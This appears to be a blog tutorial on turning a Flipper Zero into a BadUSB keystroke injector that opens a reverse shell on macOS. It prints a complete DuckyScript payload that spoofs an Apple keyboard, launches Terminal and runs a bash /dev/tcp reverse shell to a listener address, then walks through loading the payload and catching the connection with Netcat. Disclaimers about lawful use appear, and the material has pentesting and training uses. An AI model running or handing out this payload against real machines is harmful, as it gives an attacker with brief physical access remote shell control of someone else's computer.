In this article, you will find everything related to the Flipper Zero ban in Canada.
810 
Learn how to use Flipper Zero to run a Reverse Shell on macOS. Step-by-step instructions on creating a DuckyScript, configuring Netcat, and running BadUSB to scan your system for vulnerabilities.
Using Flipper Zero, a compact 12-line text file in DuckyScript and a remote listener (Listener) on an Ubuntu server, you can run Reverse Shell on a computer running macOS Ventura.
Reverse Shell on macOS is used for a variety of tasks, including cybersecurity testing, remote system administration, and information security training. In the field of pentesting, Reverse Shell helps to identify weaknesses in security systems and assess their reliability. However, it is worth remembering that the use of such technologies on other people’s or corporate devices without permission is a violation of law and ethics. All actions should be performed exclusively within the legal framework.
Flipper Zero is a universal portable device designed to interact with digital systems. It has a wide range of functions for analyzing and modifying various types of wireless signals and protocols.
Flipper Zero’s main capabilities include working with RFID, radio frequency signals, infrared, and other types of wireless communication. Flexible program code allows you to adapt the device to the user’s needs and expand its functionality for specific tasks.
Devices like Flipper Zero BadUSB operate using payloads built on DuckyScript, a simple scripting language that allows you to automate keystrokes on a target computer.
The main resource for developing and finding DuckyScript script examples is the official Hak5 website, which provides documentation and examples for implementing various functions.
ID 05ac:021e Apple:Keyboard DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 200 ENTER DELAY 1000 STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 DELAY 1000 ENTER DELAY 1000
The IP address 10.10.10.157 and port 4444 need to be changed to the IP address and port of your server. After that, the file should be saved as rev_shell_macos.txt.
It is worth noting that the Flipper Zero badusb directory does not support subdirectories. Therefore, if you plan to use multiple payloads for different operating systems, it is a good idea to follow a clear naming convention for convenience.
If qflipper is not yet installed, you need to go to the official Flipper Zero update page and download the installer that matches your operating system. After downloading, install it according to the instructions on the site.
Open the qflipper app and select the folder icon highlighted in red in the screenshot.
Select and double-click the SD card to view the contents.
Disconnect Flipper Zero from your computer after copying the file.
BadUSB based on Flipper Zero is ready to run, but before that you need to configure a remote listener on the server. To do this on an Ubuntu server, use the command:
This command starts a Netcat listener that listens for incoming connections. Here is a breakdown of the command:
Now that the Netcat listener is ready and waiting for an incoming connection, we can proceed with the BadUSB attack.
The hardest part is done. The BadUSB file reverse_shell_macos.txt is written, moved to Flipper Zero, and the Netcat listener waits for a connection. Now we go to the “Bad USB” menu.
The BadUSB script execution process can be monitored in the main window of the Flipper Zero device. Once the execution status reaches 100%, it means that the payload is complete. At this point, the Flipper Zero can be safely disconnected from the USB port.
While the DuckyScript script is running, you can watch the exploit launch on your iMac screen. At the same time, the Netcat listener on your Ubuntu server shows the results of a successful connection.
Once you have successfully launched the Reverse Shell, you have access to your macOS system. You can now control your computer as if you were using a physical keyboard, working through the BASH shell on Linux.
Through the Reverse Shell, it is possible to use basic Linux commands to control macOS. Below are examples of such commands:
whoami — specifies the username under which the connection is made.
pwd — shows the current working directory.
ls — lists the files and folders in the current directory.
cd — is used to move between directories.
These commands allow you to navigate the file system and interact with the operating system as if it were a local terminal.
Understanding how Flipper Zero works as a BadUSB device allows you to create your own scripts for task automation or security testing. You can use:
The official Hak5 website, which provides documentation and examples of DuckyScript scripts.
GitHub repositories containing ready-made scripts and useful tools for further adaptation.
It is important to remember to follow ethical and legal norms: BadUSB should only be used on your own devices or with explicit permission. Any other actions may have legal and moral consequences.
810 
1665 
1333 
1942